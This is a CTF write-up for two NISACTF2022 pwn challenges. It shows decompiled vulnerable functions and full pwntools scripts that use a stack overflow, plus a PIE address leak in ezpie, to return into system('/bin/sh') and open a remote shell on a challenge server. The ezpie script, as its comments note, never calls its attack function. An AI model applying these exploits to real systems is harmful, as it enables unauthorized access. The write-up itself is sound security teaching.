pwn - write ups
[NISACTF2022]ezpie
- checksec
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
OHHH!,give you a gift!
0x56573770
Input:
- main
// Decompiled main() of ezpie. Disables stdio buffering, prints the runtime
// address of main itself with "%p", then hands control to vuln(). With PIE
// enabled (see the checksec output above) that printed pointer discloses
// where the image was loaded, which is the information leak the writeup's
// offset calculation below relies on.
int __cdecl main(int argc, const char **argv, const char **envp)
{
    setbuf(stdin, 0);   // stdin unbuffered
    setbuf(stdout, 0);  // stdout unbuffered, so the leak line is emitted immediately
    puts("OHHH!,give you a gift!");
    printf("%p\n", main);  // leaks a code address, undoing PIE randomisation
    puts("Input:");
    vuln();
    return 0;
}
- vuln
// Decompiled vuln() of ezpie. Reads up to 0x50 bytes into a stack slot the
// decompiler places at ebp-0x28, so the read can run past the saved frame
// pointer and the return address. checksec above reports no stack canary,
// so the overwrite is not detected before the function returns.
// Mitigation: bound the read to the buffer's real size.
ssize_t vuln()
{
    char buf; // [esp+0h] [ebp-28h]
    return read(0, &buf, 0x50u);  // 0x50 > the 0x28 bytes below ebp
}
vuln()有溢出
已知程序会输出main地址，程序main函数地址为00000770，则
main_addr = int(io.recvline(),16)
offset = main_addr - main_add
接收程序输出的main函数地址,减去静态地址算出offset
- shell
// Decompiled shell() of ezpie. Nothing in main() or vuln() above calls it;
// it is a leftover function that spawns a shell, and its mere presence in
// the binary is what turns the overflow into a one-step exploit.
int shell()
{
    return system("/bin/sh");
}
获取shell地址
bin_sh = elf.sym['shell']
加上offset,得bin_sh_final
bin_sh_final = offset + bin_sh
完整exp
from pwn import *
# pwntools target settings: 32-bit x86 Linux, with every tube I/O logged.
context(os='linux', arch='i386', log_level='debug')

# 0 selects the remote instance; anything else runs a local process
# (the path is left blank in the writeup).
content = 0
io = remote('124.221.24.137', 28638) if content == 0 else process('')
def atk():
    """Run the leak-then-overflow sequence described in the writeup.

    Uses the module-level ``io`` tube. Note that the listing defines this
    function but never invokes it. The order of tube reads and log lines
    is kept exactly as in the original.
    """
    binary = ELF('')
    # 0x28 bytes reach the end of buf (ebp-0x28 in vuln) and 0x4 more cover
    # the saved ebp, so the next 4-byte word is the return address slot.
    pad = 0x28 + 0x4
    shell_sym = binary.sym['shell']

    # The program prints main's runtime address right after the banner;
    # one leaked code pointer is enough to compute the PIE load offset.
    io.recvuntil('OHHH!,give you a gift!\n')
    leaked_main = int(io.recvline(), 16)
    success('[+]main_addr=' + hex(leaked_main))

    static_main = binary.sym['main']
    slide = leaked_main - static_main  # runtime address minus link-time address
    success('[+]offset=' + hex(slide))

    io.recvuntil('Input:\n')
    success('[+]bin_sh=' + hex(shell_sym))
    target = slide + shell_sym
    success('[+]bin_sh_final=' + hex(target))

    # NOTE: p64 produces an 8-byte value; the ezstack script on this page
    # packs its return slot with p32. Reproduced as in the original.
    payload = b''.join((b'a' * pad, p64(target)))
    io.sendline(payload)
    io.interactive()
[NISACTF2022]ezstack
- main
// Decompiled main() of ezstack. Disables stdio buffering and goes straight
// into shell(), which holds all input handling (and the overflowing read).
int __cdecl main(int argc, const char **argv, const char **envp)
{
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    shell();
    return 0;
}
- shell
// Decompiled shell() of ezstack. Runs a banner command through system(),
// then reads up to 0x60 bytes into a stack slot at ebp-0x48, so the read
// overruns the saved frame pointer and the return address.
// Because the binary itself calls system(), a system entry is present in
// the image; the writeup's script resolves it with elf.sym['system'].
// Mitigation: bound the read to the buffer size (or use a sized array).
ssize_t shell()
{
    char buf; // [esp+0h] [ebp-48h]
    system("echo Welcome to NISACTF");
    return read(0, &buf, 0x60u);  // 0x60 > the 0x48 bytes below ebp
}
shell函数处有溢出
完整exp
from pwn import *
# Load the challenge binary (path left blank in the writeup) and connect to
# the remote service; the commented line is the local alternative.
elf = ELF('')
# io = process('')
io = remote('124.221.24.137', 28760)

# buf sits at ebp-0x48 in shell(); 0x48 bytes fill it and 0x4 cover the saved ebp.
pad = 0x48 + 0x4

# The script uses the ELF's link-time addresses directly, with no leak step,
# which presumes the binary is not position-independent (no checksec is
# shown for ezstack on this page).
bin_sh = next(elf.search(b'/bin/sh'))
system = elf.sym['system']
success('[+]bin_sh=' + hex(bin_sh))
success('[+]system=' + hex(system))
shell = elf.sym['shell']  # logged only; it is not placed in the payload
success('[+]shell=' + hex(shell))

# Padding, then the return slot pointing at system, then the word that
# system() reads as its first argument.
payload = b''.join((b'a' * pad, p32(system), p32(bin_sh)))
io.sendline(payload)
io.interactive()